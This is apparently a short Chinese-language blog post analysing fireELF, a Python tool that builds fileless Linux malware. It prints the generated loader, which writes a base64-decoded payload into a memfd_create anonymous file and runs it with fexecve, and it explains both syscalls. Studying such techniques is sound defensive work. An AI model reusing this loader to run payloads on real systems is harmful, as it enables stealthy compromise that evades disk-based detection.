2019-M02 - Fileless Malware Framework
看文章的時候看到了一個 [project][0] 介紹 fileless 的惡意程式：他是用 python 寫的 linux-based
的無檔案惡意程式套件 可以讓使用者簡單快速的產生、建立一個 fileless 惡意程式
不得不說，這個 project 的 source code 可讀性非常差 (雖然用 Python 撰寫的)
在 main.py 開始有兩個部分：CLI 參數的處理、以及產生惡意程式的部分
在透過一連串的操作之後最後會產生一個 Python 惡意檔案：
#! /usr/bin/env python
import ctypes, os, urllib2, base64
libc = ctypes.CDLL(None)
argv = ctypes.pointer((ctypes.c_char_p * 0)(*[]))
syscall = libc.syscall
fexecve = libc.fexecve
content = base64.b64decode("...")
fd = syscall(319, "", 1)
os.write(fd, content)
fexecve(fd, argv, argv)
從產生的程式碼來看他的目的是透過：ctypes 來找到 [fexecve][1] 跟 [sys_memfd_create][2]
這兩個 syscall 來完成無檔案的惡意程式
先透過 **memfd_create** 來產生一個暱名檔案 (anonymous file)、寫入惡意內容、最後透過 **fexecve** 執行。
[0]: https://github.com/rek7/fireELF/
[1]: https://linux.die.net/man/3/fexecve
[2]: https://www.systutorials.com/docs/linux/man/2-memfd_create/